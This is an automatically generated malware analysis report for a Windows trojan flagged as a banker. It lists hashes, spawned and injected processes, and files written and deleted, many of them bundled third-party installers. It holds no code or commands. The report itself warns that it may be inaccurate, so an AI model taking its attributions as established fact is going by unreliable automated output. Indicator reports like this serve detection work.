Trojan.NSIS.StartPage.FD, Trojan.Win32.IEDummy.FD, mzpefinder_pcap_file.YR, BankerGeneric.YR (Lavasoft MAS)Behaviour: Banker, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 4ef0a3733fc5a67cf2f092543e147b35
SHA1: faaf987b561e20472df41e1212eefa0d7b4ee66e
SHA256: 6c1fccf0dabb305645fbd5c94fbb20edeb24fe9ba33a74ed0616db0213e91019
SSDeep: 196608:/5nXAPYOn5M6jOlYBjuc8xJDKtBP0vucdOsI YVQMqmQUxPPcULmswJ3W7ixKk9S:xnAYSMw 0unXnvv0TsuPPTwJG7/koNWO
Size: 13738518 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2010-04-10 15:19:23
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
9158chat2_ktv088_63.exe:2116
sr.exe:244
9158IE.exe:3116
xianfengkunbang.exe:1324
BaiduP2PService.exe:252
BaiduP2PService.exe:472
RsMgrSvc.exe:1936
regsvr32.exe:2380
regsvr32.exe:2448
regsvr32.exe:2328
regsvr32.exe:2480
9158.exe:3012
popwndexe.exe:760
xianfengupdate.exe:660
%original file name%.exe:1736
The Trojan injects its code into the following process(es):
MM-liao8863.exe:2808
xianfeng.exe:272
QQPCDownload71960.exe:2776
install1393485.exe:1148
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process 9158chat2_ktv088_63.exe:2116 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Start Menu\Programs\9158¶àÈËÊÓÆµ\öÃâ€ÃƒËœ 9158¶àÈËÊÓÆµ.lnk (715 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\loading2.bmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\loading1.bmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step1.bmp (22192 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\9158¶àÈËÊÓÆµ\9158¶àÈËÊÓÆµ.lnk (707 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\SkinBtn.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install.bmp (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\close.bmp (824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step2.bmp (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step3.bmp (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\return.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\finish.bmp (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\checkbox2.bmp (3 bytes)
%Documents and Settings%\%current user%\Desktop\9158¶àÈËÊÓÆµ.lnk (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc11.tmp (1012028 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\custom.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\checkbox1.bmp (3 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\loading2.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\finish.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\custom.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\loading1.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\close.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step3.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\return.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step2.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\checkbox2.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step1.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\SkinBtn.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\checkbox1.bmp (0 bytes)
The process sr.exe:244 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\install.txt (344 bytes)
The process xianfengkunbang.exe:1324 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp\nsTools.dll (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr8.tmp (48917 bytes)
%Program Files%\tools\BaiduP2PService.exe (17848 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp\System.dll (11 bytes)
%Program Files%\tools\P2PStatReport.dll (12536 bytes)
%Program Files%\tools\P2SBase.dll (18424 bytes)
%Program Files%\tools\P2PBase.dll (17848 bytes)
%Program Files%\tools\sr.exe (5520 bytes)
The Trojan deletes the following file(s):
%Program Files%\tools\isWrite (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp\nsTools.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp\System.dll (0 bytes)
The process MM-liao8863.exe:2808 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M9YNOH2J\xui[1].js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OZ0N258D\CA4PMRS9.htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M9YNOH2J\CAURKDUJ.htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OZ0N258D\icons[1].gif (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\Opendownloadernewxml[1].htm (899 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6N8PMZAJ\Downloaderconfig[1].htm (948 bytes)
%Program Files%\9158ktv\DownLoad\9158chat2_ktv088_63.exe.tmp (121120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\CA8HUBK5.htm (764 bytes)
C:\temp.icon (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6N8PMZAJ\main[1].ico (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\1[1].swf (48341 bytes)
The process BaiduP2PService.exe:472 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\62B5AF9BE9ADC1085C3C56EC07A82BF6 (148 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabA.tmp (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabE.tmp (50 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabC.tmp (54 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe.bdtp (158659 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe.bdre (1040 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarD.tmp (2712 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\MM-liao8863.exe.bdtp (117549 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\ch_dl_url.exe.bdre (2840 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\ch_dl_url.exe.bdtp (412553 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarB.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F (176 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\MM-liao8863.exe.bdre (892 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (50 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F (533 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\bdsecushr.dat (3628 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\62B5AF9BE9ADC1085C3C56EC07A82BF6 (224 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\install1393485.exe.bdtp (568599 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\tasks.dat (2420 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\install1393485.exe.bdre (2124 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarF.tmp (2712 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\TarD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarB.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\MM-liao8863.exe.bdre (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\install1393485.exe.bdre (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabA.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe.bdre (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\tasks.ini (0 bytes)
The process xianfeng.exe:272 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\ioSpecial.ini (1796 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\modern-wizard.bmp (26 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp (0 bytes)
The process RsMgrSvc.exe:1936 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\Rising\RSD\RsMgrSvc.exe.log (367 bytes)
%Program Files%\Rising\RSD\RsMgrSvc.dat (708 bytes)
The process QQPCDownload71960.exe:2776 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\QQPCDetector.dll (5257 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\QQPCMgr_Setup.exe (454597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\setup.xml (580 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\version (672 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\QQPCDownload.dll (9775 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\qmdr\dr.dll (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\QQPCDownload.kui (1661 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\version (0 bytes)
The process install1393485.exe:1148 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ui\snin.htm (527 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\rsmon.db1 (43 bytes)
%Program Files%\Rising\RSD\RsMgrSvc.exe (673 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsdinfo.dll (601 bytes)
%Program Files%\Rising\RSD\RsMgrsvc.ini (60 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\userdata.rstray (293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\moncom08.dll (443 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\moncomm.dll (1222 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\sysmon.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\label.dat (384 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\datastorage.db (19 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\CfgDll.dll (701 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\comx3.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCFG\rscfg.dll (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\rsmain.dll (1353 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\lics936.txt (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rscommx2.dll (479 bytes)
%Program Files%\Rising\RSD\XMLS\RSSetup.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsMgrSvc.exe (1855 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\uprsuser.dat (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\kguard.sys (1707 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCFG\RSCFG.xml (996 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD932\Jpn.lag (37 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\os.xml (685 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\Setup.exe (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsxml3w.dll (1848 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMON\RAVMON.xml (574 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\_rav\_rav.xml (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\comx3.dll (709 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\monbasedui.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\RAVCONFIG.xml (518 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RstoreDll.dll (953 bytes)
%Program Files%\Rising\RSD\RSD950\CHT.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\selfmon.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\url.ini (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\atl90.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\userdata.mond (485 bytes)
%Program Files%\RsTest.ini (14 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\os.xml (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravxp\ravxp.exe (86 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\ravconfig.xml (518 bytes)
%Program Files%\Rising\RSD\updater.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudnotifier.dll (2752 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\license\12345678.000 (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\Microsoft.VC90.ATL.manifest (466 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\uprsmon.dat (45 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\dfw.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsutils.sys (734 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\CompsVer.inf (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\LogDc.bmp (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Setup.exe (8063 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsndisp.sys (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\ravbase.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\userdata.mond (485 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\setup.dll (3859 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\LogAc.bmp (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudv3.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RavSetup.dll (7433 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVXP\RAVXP.xml (404 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bacore.dll (2321 bytes)
%Program Files%\Rising\RSD\setup.dat (601 bytes)
%Program Files%\Rising\RSD\rslang.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravlog\ravlog.xml (545 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rslang.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\rsndisp.sys (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\mscrt9.xml (961 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\rscom.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\comx3.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\chs.lag (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\rsmondef.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\CfgDll.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\rsmain.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\defmon.dll (3361 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVXP\ravxp.exe (601 bytes)
%Program Files%\Rising\RSD\ui\snin.htm (527 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\cnt09.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bawhite.dat (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\mergexml.dll (117 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\Cloudv3.dll (4727 bytes)
%Program Files%\Rising\RSD\rsmginfo.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravlog\rslog.dll (25 bytes)
%Program Files%\Rising\RSD\comx3.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\LogDc.bmp (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\comx3.dll (693 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\Microsoft.VC90.CRT.manifest (496 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rslang.dll (1655 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\ravmon.xml (574 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\adefmon.mond (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\localopt.dll (2190 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\mond.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\url.ini (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravxp\ravxp.xml (404 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsdll.dll.dat (601 bytes)
%Program Files%\Rising\RSD\os.xml (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RAV.cfg (48 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\userdata.rstray (293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Custom.xml (775 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\repairmanager.mondcoms (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSSETUP.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rssqlite.dll (4311 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\monrule.dll (211 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMON\mondcoms.xml (8 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\lics936.txt (8 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\chs.lag (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\atl90.dll (1254 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsutils_if.dll (58 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\setup.dat (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\sysmon.sys (2740 bytes)
%System%\drivers\protreg.sys (24 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\localopt.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\rscurl.dll (3126 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudnet.dll (2054 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD936\CHS.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\protreg.sys (24 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsBackup.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.mond (207 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\Rising.ico (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rscomm.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RAVBASE.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\rsutils.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\rstask.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSSetup.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\c[1].aspx (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\procenv.dll (29 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\CLOUDV3.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsStub.exe (1762 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\license\license.xml (347 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\syslay.dll (316 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\cnt08.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\updater.exe (7115 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\dataups.dat (207 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Rav.7z (22865 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\Microsoft.VC90.CRT.manifest (496 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\ravmaindui.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\msvcp90.dll (3361 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\msvcr90.dll (4185 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudwork.dll (7726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\datastorage.db (19 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bawhite.dat (22 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\traywnd.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\_RAV\setup.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\Cloudv3.dll (3073 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsutils.sys (601 bytes)
%Program Files%\Rising\RSD\RSD932\Jpn.lag (37 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\setup.dat (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\protreg.sys (24 bytes)
%Program Files%\Rising\RSD\update.xml (164 bytes)
%Program Files%\Rising\RSD\popwndexe.exe (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\RsBaseNetWrapper.dll (48 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\RSMONDEF.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsTray.ico (601 bytes)
%Program Files%\Rising\RSD\Data\RAV\RAV.ini (50 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\update.xml (164 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\update.xml (164 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\Proccomm.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD950\CHT.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\RSDK.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVLOG\RAVLOG.xml (545 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\moncom08.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\_RAV\_RAV.xml (368 bytes)
%Program Files%\Rising\RSD\RsAppMgr.dll (64 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\pngdll.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD1252\Eng.lag (52 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmginfo.dll (1115 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\syslay.dll (26 bytes)
%Program Files%\Rising\RSD\RsStub.exe (64 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RAV.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\rspalvd.dll (1411 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RavSetup.dll (12014 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\rscombas.dll (2035 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bacore.dll (5060 bytes)
%Program Files%\Rising\RSD\RSD1252\Eng.lag (52 bytes)
